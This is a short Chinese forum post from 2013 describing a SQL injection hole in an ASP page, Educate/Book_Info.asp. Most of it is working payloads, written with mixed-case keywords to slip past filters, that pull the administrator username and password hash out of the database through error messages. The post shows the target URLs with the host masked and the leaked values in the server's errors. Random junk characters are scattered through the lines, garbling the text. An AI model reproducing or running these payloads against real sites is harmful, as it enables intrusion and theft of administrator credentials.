漏洞出现在Educate/Book_Info.asp ( J. D& I. k! z8 ?) I. m5 x4 Q/ Z
0 c$ d3 r' {2 u% k" N, m9 s
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
0 ], V6 [7 W" ^: t8 U; l- k+ _" ?
+ l# D! \9 P) k1 c3 Cexp:如下
# g9 _2 H& I! [ y1 o' f9 w查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# H6 s8 j' ?' l' O
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)6 T- t: @/ h- O! e! f
5 B4 f; V9 |0 e9 m% R1 g( M) o( t* @
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 _* r+ u. C. l
, k( d* d# d( v y5 G% L$ ZMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
& A. }% h2 Q8 [1 C& W5 I# r' m+ }& Q6 ~ 6 |, V) A) `' \* l6 E
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
( D! R- e' V; W9 w( l
0 K1 Q b( w Z) n4 |% u/Educate/Book_Info.asp,行 8- D( m9 F; C! }5 t g0 X6 b
, _' d0 D+ c. @& d( W& K
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
* Y9 Z% e$ J ]4 T- A1 u 4 q2 z5 Q" j9 r0 C7 o
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
0 [3 P9 ?' D, Y8 Z
: s, ~2 T/ U7 Y5 o$ w; X将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
# Y; T! h! ]$ Z1 {; y8 g2 y 4 C' c/ o6 y, |! e
/Educate/Book_Info.asp,行 85 X1 e- }2 x1 v1 G7 t
|
发表于 2013-2-16 21:44:16
收藏
支持
反对